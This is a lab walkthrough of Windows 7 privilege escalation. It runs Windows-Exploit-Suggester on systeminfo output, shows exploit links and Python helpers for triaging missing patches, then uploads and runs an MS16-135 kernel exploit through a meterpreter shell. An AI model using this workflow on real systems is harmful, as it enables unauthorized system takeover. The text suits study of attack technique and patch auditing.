                           [117]: KB3004361
                           [118]: KB3004375
                           [119]: KB3004469
                           [120]: KB3006121
                           [121]: KB3006137
                           [122]: KB3010788
                           [123]: KB3011780
                           [124]: KB3013531
                           [125]: KB3019978
                           [126]: KB3020370
                           [127]: KB3020388
                           [128]: KB3021674
                           [129]: KB3021917
                           [130]: KB3022777
                           [131]: KB3023215
                           [132]: KB3030377
                           [133]: KB3031432
                           [134]: KB3035126
                           [135]: KB3035132
                           [136]: KB3037574
                           [137]: KB3042058
                           [138]: KB3045685
                           [139]: KB3046017
                           [140]: KB3046269
                           [141]: KB3046480
                           [142]: KB3054476
                           [143]: KB3055642
                           [144]: KB3059317
                           [145]: KB3060716
                           [146]: KB3067903
                           [147]: KB3068708
                           [148]: KB3071756
                           [149]: KB3072305
                           [150]: KB3074543
                           [151]: KB3075220
                           [152]: KB3075226
                           [153]: KB3076895
                           [154]: KB3078601
                           [155]: KB3078667
                           [156]: KB3080079
                           [157]: KB3080149
                           [158]: KB3084135
                           [159]: KB3086255
                           [160]: KB3092601
                           [161]: KB3092627
                           [162]: KB3093513
                           [163]: KB3097989
                           [164]: KB3101722
                           [165]: KB3102429
                           [166]: KB3107998
                           [167]: KB3108371
                           [168]: KB3108381
                           [169]: KB3108664
                           [170]: KB3109103
                           [171]: KB3109560
                           [172]: KB3110329
                           [173]: KB3115858
                           [174]: KB3122648
                           [175]: KB3124275
                           [176]: KB3126587
                           [177]: KB3127220
                           [178]: KB3133977
                           [179]: KB3137061
                           [180]: KB3138378
                           [181]: KB3138612
                           [182]: KB3138910
                           [183]: KB3139398
                           [184]: KB3139914
                           [185]: KB3140245
                           [186]: KB3147071
                           [187]: KB3150220
                           [188]: KB3150513
                           [189]: KB3155178
                           [190]: KB3156016
                           [191]: KB3156019
                           [192]: KB3159398
                           [193]: KB3161102
                           [194]: KB3161949
                           [195]: KB3161958
                           [196]: KB3170735
                           [197]: KB3172605
                           [198]: KB3177467
                           [199]: KB3179573
                           [200]: KB3181988
                           [201]: KB3184143
                           [202]: KB4019990
                           [203]: KB4040980
                           [204]: KB4474419
                           [205]: KB4490628
                           [206]: KB958488
                           [207]: KB976902
                           [208]: KB976932
                           [209]: KB982018
                           [210]: KB4054518
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.248.254
                                 IP address(es)
                                 [01]: 192.168.248.150
                                 [02]: fe80::583e:5c71:fbf1:623c

Save the output of systeminfo to a file named win7.txt; here it is /root/Tmp/win7.txt.
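To see what the suggester is about to do with win7.txt, here is the patch-gap comparison in miniature, as an added example that is neither the tool's code nor the author's. It parses a constructed systeminfo excerpt for the OS version, architecture and installed KB list, then diffs that list against a hand-made bulletin table. The table is an assumption for illustration: it keys each bulletin on the bulletin-level KB number the tool prints in its report, whereas the real tool reads Microsoft's mssb.xls, which carries per-product update KBs and supersedence.

```python
"""Patch-gap comparison in miniature (added example, not windows-exploit-suggester's code).

Parses a `systeminfo` dump for OS version, architecture and installed KBs, then
reports bulletins whose closing KB is absent. The bulletin table is constructed
for illustration only; the real tool uses Microsoft's bulletin spreadsheet.
"""
import re
import sys

# Constructed excerpt of a Windows 7 SP1 x64 `systeminfo` dump (sample input).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7-PC
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB2533552
                           [02]: KB3057191
                           [03]: KB3164038
                           [04]: KB4474419
"""

# Constructed bulletin table (assumption, illustrative only):
# bulletin -> (KB that closes it, affected NT versions, impact class).
BULLETINS = {
    "MS16-135": ("KB3199135", {"6.1", "6.3", "10.0"}, "EoP"),
    "MS16-098": ("KB3178466", {"6.1", "6.3"}, "EoP"),
    "MS16-075": ("KB3164038", {"6.1", "6.3", "10.0"}, "EoP"),
    "MS16-016": ("KB3136041", {"6.1"}, "EoP"),
    "MS15-051": ("KB3057191", {"6.1", "6.3"}, "EoP"),
    "MS14-064": ("KB3011443", {"6.1", "6.3"}, "RCE"),
}

_KB_RE = re.compile(r"\bKB\d{6,7}\b")
_VER_RE = re.compile(r"^OS Version:\s*(\d+\.\d+)\.(\d+)", re.M)
_ARCH_RE = re.compile(r"^System Type:\s*(x64|x86)-based", re.M | re.I)


def parse_systeminfo(text):
    """Return NT version ("6.1"), build (7601), arch ("x64"/"x86") and the KB set."""
    ver = _VER_RE.search(text)
    arch = _ARCH_RE.search(text)
    if not ver or not arch:
        raise ValueError("not a systeminfo dump: OS Version / System Type missing")
    return {
        "version": ver.group(1),
        "build": int(ver.group(2)),
        "arch": arch.group(1).lower(),
        # the installed KB list is the only thing the comparison really needs
        "hotfixes": set(_KB_RE.findall(text)),
    }


def missing_bulletins(info, table=BULLETINS, impact=None):
    """Bulletins covering this OS version whose closing KB is not installed.

    `impact` optionally narrows the result to e.g. "EoP", dropping RCE/DoS noise.
    """
    out = []
    for bulletin, (kb, versions, kind) in sorted(table.items()):
        if info["version"] not in versions:
            continue  # bulletin does not cover this OS
        if impact and kind != impact:
            continue
        if kb not in info["hotfixes"]:
            out.append(bulletin)
    return out


if __name__ == "__main__":
    # Usage: python3 patchgap.py /root/Tmp/win7.txt   (falls back to the sample)
    if len(sys.argv) > 1:
        data = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:
        data = SAMPLE_SYSTEMINFO
    info = parse_systeminfo(data)
    print("Windows NT %s build %d %s, %d hotfixes installed"
          % (info["version"], info["build"], info["arch"], len(info["hotfixes"])))
    for b in missing_bulletins(info, impact="EoP"):
        print("missing:", b)
```

The `impact` filter is the part the real report lacks: it lists IE and OLE RCE bulletins next to the kernel-mode ones, and only the latter matter once you already have a shell.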

Windows-Exploit-Suggester

┌──(root㉿kali)-[~/Windows/exploiting/Windows-Exploit-Suggester]
└─# ls
LICENSE.md  README.md  windows-exploit-suggester.py
                                                                                                       
┌──(root㉿kali)-[~/Windows/exploiting/Windows-Exploit-Suggester]
└─# python2 windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2022-10-07-mssb.xls
[*] done
                                                                                                                                                                                             
┌──(root㉿kali)-[~/Windows/exploiting/Windows-Exploit-Suggester]
└─# ls
2022-10-07-mssb.xls  LICENSE.md  README.md  windows-exploit-suggester.py

If you get the error "please install and upgrade the python-xlrd library", follow sakyb7cedelgadosalazar's answer. The tool runs under Python 2, so pip and xlrd have to be installed for that interpreter:

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py

python2 get-pip.py   # use the same interpreter that runs the suggester; on Kali, `python` may be Python 3 or absent

python2 -m pip install --user xlrd==1.1.0
┌──(root㉿kali)-[~/Windows/exploiting/Windows-Exploit-Suggester]
└─# python2 windows-exploit-suggester.py --database 2022-10-07-mssb.xls --systeminfo /root/Tmp/win7.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 210 hotfix(es) against the 386 potential bulletins(s) with a database of 137 known exploits
[*] there are now 147 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 64-bit'
[*] 
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*] 
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*] 
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*] 
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*] 
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*] 
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*]   https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*]   https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*] 
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*] 
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[*]   http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
[*]   http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]   http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*] 
[*] done
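The report above mixes local privilege-escalation leads with IE bugs, a win32k denial-of-service PoC and remote-code-execution entries, none of which elevate an existing shell. As an added example (not the tool's code nor the author's), the following parser reads the report in the format printed above, keeps the bulletin/reference tree, and classifies each reference by keywords in its URL and title. The sample input is a constructed excerpt in that format; the keyword lists are an assumption tuned to the wording seen in the report.

```python
"""Triage windows-exploit-suggester output for local privilege escalation
(added example, not the tool's code).

Header lines look like "[E] MS16-135: <title> - <severity>"; the references
under a header look like "[*]   <url> -- <title>" (title optional).
"""
import re

# Constructed excerpt in the tool's report format (sample input).
SAMPLE_OUTPUT = """\
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*] done
"""

HEADER_RE = re.compile(r"^\[(E|M)\]\s+(MS\d{2}-\d{3}):\s+(.*?)\s+-\s+(\w+)\s*$")
ENTRY_RE = re.compile(r"^\[\*\]\s{2,}(\S+)(?:\s+--\s+(.*\S))?\s*$")

# Keyword heuristics (assumption: tuned to the wording the report uses).
LPE_WORDS = ("privilege escalation", "elevation of privilege", "local privilege", "potato")
NOISE_WORDS = ("denial of service", "remote code execution", "memory disclosure", "internet explorer")


def parse_suggester(text):
    """Return [{flag, bulletin, title, severity, refs: [(url, title_or_None)]}] in report order."""
    bulletins = []
    for line in text.splitlines():
        h = HEADER_RE.match(line)
        if h:
            bulletins.append({"flag": h.group(1), "bulletin": h.group(2),
                              "title": h.group(3), "severity": h.group(4), "refs": []})
            continue
        e = ENTRY_RE.match(line)
        if e and bulletins:  # a reference belongs to the most recent header
            bulletins[-1]["refs"].append((e.group(1), e.group(2)))
    return bulletins


def classify_ref(url, title):
    """'lpe' for local privilege escalation, 'noise' for DoS/RCE/client bugs, else 'unknown'."""
    haystack = (url + " " + (title or "")).lower()
    if any(w in haystack for w in LPE_WORDS):
        return "lpe"
    if any(w in haystack for w in NOISE_WORDS):
        return "noise"
    return "unknown"


def lpe_candidates(text):
    """(bulletin, url) pairs worth trying from a low-privileged shell.

    Metasploit-backed ([M]) bulletins come first; within a group, report order is kept.
    """
    out = []
    for b in parse_suggester(text):
        header_lpe = "elevation of privilege" in b["title"].lower()
        for url, title in b["refs"]:
            kind = classify_ref(url, title)
            # an untitled reference under an EoP bulletin is still a lead
            if kind == "lpe" or (kind == "unknown" and header_lpe):
                out.append((b["flag"], b["bulletin"], url))
    out.sort(key=lambda t: t[0] != "M")  # stable sort: [M] entries first
    return [(bulletin, url) for _, bulletin, url in out]


if __name__ == "__main__":
    for bulletin, url in lpe_candidates(SAMPLE_OUTPUT):
        print(bulletin, url)
```

Two things the heuristic makes visible: exploit-db 40745 under MS16-135 is a denial-of-service PoC and is dropped, while the untitled tinysec link is only kept if its bulletin header itself says "Elevation of Privilege". Even a correctly chosen lead has preconditions: win32k exploits such as the NtSetWindowLongPtr one create windows and therefore need a process attached to an interactive window station, so a shell spawned from a non-interactive session can exit without any output.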

Search Google for MS16-135.

windows-kernel-exploits

Clone the repository and change into its MS16-135 directory:

┌──(root㉿kali)-[~/Windows/exploiting/windows-kernel-exploits/MS16-135]
└─# ls
40823  40823-source.zip  41015.c  41015.exe  MS16-135.ps1  README.md  Win10.png  Win7.png  Win81.png  Win8.png
┌──(root㉿kali)-[~/Windows/exploiting/windows-kernel-exploits/MS16-135]
└─# pwd                                          
/root/Windows/exploiting/windows-kernel-exploits/MS16-135

Upload 41015.exe to C:\Temp on the target Windows 7 SP1 machine:

meterpreter > cd C:\\Temp
meterpreter > pwd
C:\Temp
meterpreter > upload /root/Windows/exploiting/windows-kernel-exploits/MS16-135/41015.exe
[*] uploading  : /root/Windows/exploiting/windows-kernel-exploits/MS16-135/41015.exe -> 41015.exe
[*] Uploaded 132.50 KiB of 132.50 KiB (100.0%): /root/Windows/exploiting/windows-kernel-exploits/MS16-135/41015.exe -> 41015.exe
[*] uploaded   : /root/Windows/exploiting/windows-kernel-exploits/MS16-135/41015.exe -> 41015.exe
meterpreter > shell
Process 3492 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Temp>whoami
whoami
iewin7\unpriv

C:\Temp>dir
dir
 Volume in drive C is Windows 7
 Volume Serial Number is 5812-32B0

 Directory of C:\Temp

10/07/2022  07:06 PM    <DIR>          .
10/07/2022  07:06 PM    <DIR>          ..
10/07/2022  07:06 PM           135,680 41015.exe
10/07/2022  11:05 AM             7,168 payload64.exe
10/02/2022  10:46 PM                16 windowslog.txt
               3 File(s)        142,864 bytes
               2 Dir(s)  15,973,179,392 bytes free

Running 41015.exe from the shell: the privilege escalation fails and no elevated shell is obtained.

C:\Temp>.\41015.exe
.\41015.exe
Please enter an OS version
The following OS'es are supported:
        [*] 7  - Windows 7
        [*] 81 - Windows 8.1
        [*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)
        [*] 12 - Windows 2012 R2

        [*] For example:  cve-2016-7255.exe 7    -- for Windows 7
C:\Temp>.\41015.exe 7
.\41015.exe 7

I'm not going to push this any further.